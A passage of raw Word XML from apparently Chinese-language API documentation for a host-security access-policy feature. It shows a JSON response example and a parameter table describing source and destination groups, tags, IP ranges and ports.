      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部标签",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcIpRanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcAgentSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcAgentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcIpName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ports": ["99"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"status": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1654501762618,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>optUsername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "admin@sec.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayDstIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displaySrcIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "99",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>switchStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"operation": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"filters": {},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FBF40"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563"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2715276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328C21B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DAB6710" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="139DC82D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21904E91" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7194CDEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74AC78C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A14993" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2890E0B7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3822D310" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B07E41B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68C6AABC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B01B94D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59098DF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E98337E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FFC3ECB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="222A77FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C2EAAB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55583653" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3428F421" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EF399FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524A3B97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DCF46A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B9930D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2557D0CB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5267A912" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DCE04C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="139A666B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7912AA17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F1BEE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstAgentSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3934B45A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F7A8C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C225103" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C141F5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B03A839" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26595518" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57FC750C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B8AAB04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstIpName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71CFAADE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46DAEE80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74C422F8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B233151" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6027AFBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D8DD227" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68420C4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237E673A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="434ADB89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29D4EAD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="577725A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48DEC9C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25EFAF09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771ABAA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BD84072" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EB7BAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F3EAFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8B01FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CB82888" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="422D20B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcAgentSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="584CFB60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C54651F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F225B6B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF7D42D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1193BC69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BAFB792" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C5B0DFF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7419E99D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIpName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212432C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BC06BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48D7BD74" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
